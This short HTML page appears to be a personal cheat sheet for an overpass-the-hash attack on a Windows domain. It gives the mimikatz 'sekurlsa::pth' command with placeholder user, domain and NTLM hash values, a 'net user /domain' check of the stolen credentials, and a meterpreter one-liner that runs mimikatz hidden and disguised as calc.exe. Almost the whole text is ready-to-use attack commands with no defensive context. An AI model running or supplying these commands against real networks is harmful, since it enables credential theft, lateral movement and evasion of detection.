<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Pass the hash</title>
</head><body>Over Pass The Hash<br/>
<br/>
USE - mimikatz.exe<br/>
<br/>
TYPE IN THE SHELL - sekurlsa::pth /user:improvement /domain:victim.local /ntlm:&lt;enter second half of ntlm hash&gt;<br/>
<br/>
CHECK YOUR CREDS - then in cmd window, check your shit net user &lt;username&gt; /domain<br/>
<br/>
----------<br/>
<br/>
From meterpreter<br/>
<br/>
execute -H -i -c -m -d calc.exe -f /usr/share/mimikatz/x64/mimikatz.exe -a ' "sekurlsa::pth /user:improvement /domain:victim.local /ntlm:1234567890" exit'</body></html>